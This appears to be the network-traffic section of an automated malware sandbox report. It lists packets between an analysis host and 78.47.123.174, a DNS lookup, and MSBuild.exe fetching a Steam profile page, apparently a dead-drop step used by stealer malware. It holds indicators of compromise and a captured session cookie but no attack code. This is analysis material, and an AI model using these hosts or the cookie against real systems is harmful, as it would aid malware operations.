                                                                                        May 24, 2024 10:27:26.034955978 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.034986973 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.035000086 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.035029888 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.035048008 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.044570923 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.044595957 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.044646978 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.044660091 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.044686079 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.044703960 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.066695929 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.066744089 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.066886902 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.066948891 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.067018032 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.081933022 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.081957102 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.082129002 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.082129002 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.082191944 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.082252026 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.093106031 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.093130112 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.093228102 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.093245029 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.093303919 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.102725029 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.102756023 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.102807999 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.102823019 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.102853060 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.102874041 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.112263918 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.112286091 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.112452030 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.112467051 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.112525940 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.118818045 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.118839025 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.118892908 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.118906021 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.118935108 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.118952036 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.127403021 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.127424955 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.127474070 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.127485991 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.127515078 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.127532005 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.140291929 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.140314102 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.140476942 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.140476942 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.140539885 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.140595913 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.161250114 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.161272049 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.161427975 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.161427975 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.161489964 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.161546946 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.172724962 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.172751904 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.172802925 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.172818899 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.172851086 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.172871113 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.192790031 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.192837000 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.192892075 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.192918062 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.192967892 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.192967892 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.198724985 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.198753119 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.198803902 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.198824883 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.198851109 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.198870897 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.206248045 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.206273079 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.206348896 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.206348896 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.206410885 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.206468105 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.215115070 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.215167999 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.215255022 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.215270042 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.215354919 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.222780943 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.222805023 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.222873926 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.222891092 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.222997904 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.241668940 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.241714954 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.241831064 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.241832018 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.241894007 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.241964102 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.255970001 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.256043911 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.256053925 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.256069899 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.256102085 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.256123066 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.272463083 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.272481918 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.272754908 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.272815943 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.272874117 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.287508965 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.287532091 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.287584066 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.287600040 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.287632942 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.287656069 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.293102026 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.293128967 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.293176889 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.293190956 CEST4434975978.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:26.293220997 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:26.293241024 CEST49759443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.329359055 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.329421043 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.329438925 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.329478979 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.363078117 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363097906 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363305092 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.363326073 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.363380909 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391751051 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391804934 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391839027 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.391846895 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391885996 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.391906023 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.392458916 CEST49761443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.392477989 CEST4434976178.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.577991009 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578032970 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:29.578108072 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578397989 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:29.578413010 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.264190912 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265315056 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.265341043 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265356064 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.265367031 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.776145935 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776189089 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:30.776253939 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776508093 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:30.776525021 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001147032 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001210928 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.001224041 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.001256943 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.001983881 CEST49762443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.002006054 CEST4434976278.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.454801083 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.454967976 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455447912 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455463886 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:31.455658913 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:31.455672026 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141060114 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141119003 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141241074 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141241074 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141257048 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.141324043 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141664028 CEST49763443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.141710997 CEST4434976378.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.145246029 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145303965 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.145425081 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145730972 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.145751953 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.900789022 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.901091099 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901566982 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901595116 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:32.901731968 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:32.901745081 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587704897 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587847948 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.587902069 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.587979078 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.588021040 CEST49764443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.588062048 CEST4434976478.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.589250088 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589296103 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:33.589421988 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589618921 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:33.589653969 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.326842070 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.327047110 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327425957 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327452898 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:34.327585936 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:34.327600956 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016491890 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016546011 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016602993 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016602993 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016633987 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016674995 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016679049 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.016725063 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016890049 CEST49765443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.016902924 CEST4434976578.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.034032106 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034060955 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.034164906 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034349918 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.034363985 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.783600092 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.783759117 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784290075 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784300089 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:35.784491062 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:35.784496069 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468034029 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468204021 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.468216896 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:36.468307972 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.469054937 CEST49766443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:36.469079018 CEST4434976678.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.123930931 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.123997927 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.124130011 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.124509096 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.124519110 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.777456045 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.777578115 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778182030 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778194904 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778336048 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778342009 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778459072 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778476000 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778527975 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778533936 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778584957 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778598070 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778690100 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778702974 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778723955 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778737068 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778820992 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778837919 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778856039 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778881073 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.778918982 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.778930902 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:37.779017925 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:37.779033899 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990639925 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990741968 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.990757942 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.990789890 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.991084099 CEST49767443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.991107941 CEST4434976778.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.994832993 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.994874001 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:38.994952917 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.995157003 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:38.995165110 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706155062 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706231117 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706753969 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706763983 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:39.706940889 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:39.706944942 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409694910 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409872055 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.409874916 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:40.409924984 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.410059929 CEST49768443192.168.2.478.47.123.174
                                                                                        May 24, 2024 10:27:40.410077095 CEST4434976878.47.123.174192.168.2.4
                                                                                        May 24, 2024 10:27:42.922794104 CEST4972680192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.922843933 CEST4972580192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.928811073 CEST8049726104.18.38.233192.168.2.4
                                                                                        May 24, 2024 10:27:42.928925037 CEST4972680192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:27:42.933840036 CEST8049725104.18.38.233192.168.2.4
                                                                                        May 24, 2024 10:27:42.933902025 CEST4972580192.168.2.4104.18.38.233
                                                                                        May 24, 2024 10:28:07.204853058 CEST4972380192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.205033064 CEST4972480192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.216223955 CEST8049723199.232.210.172192.168.2.4
                                                                                        May 24, 2024 10:28:07.216319084 CEST4972380192.168.2.4199.232.210.172
                                                                                        May 24, 2024 10:28:07.221324921 CEST8049724199.232.210.172192.168.2.4
                                                                                        May 24, 2024 10:28:07.221417904 CEST4972480192.168.2.4199.232.210.172
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 24, 2024 10:27:00.390662909 CEST | 54547 | 53 | 192.168.2.4 | 1.1.1.1
May 24, 2024 10:27:00.398055077 CEST | 53 | 54547 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 24, 2024 10:27:00.390662909 CEST | 192.168.2.4 | 1.1.1.1 | 0xe6fc | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 24, 2024 10:27:00.398055077 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6fc | No error (0) | steamcommunity.com | | 23.199.218.33 | A (IP address) | IN (0x0001) | false
May 24, 2024 10:27:03.652335882 CEST | 1.1.1.1 | 192.168.2.4 | 0xa39d | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
May 24, 2024 10:27:03.652335882 CEST | 1.1.1.1 | 192.168.2.4 | 0xa39d | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                                                                        • steamcommunity.com
                                                                                        • 78.47.123.174
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 23.199.218.33 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:01 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
                                                                                        Host: steamcommunity.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:02 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Date: Fri, 24 May 2024 08:27:02 GMT
                                                                                        Content-Length: 35682
                                                                                        Connection: close
                                                                                        Set-Cookie: sessionid=5c8036cc49444159af2608eb; Path=/; Secure; SameSite=None
                                                                                        Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
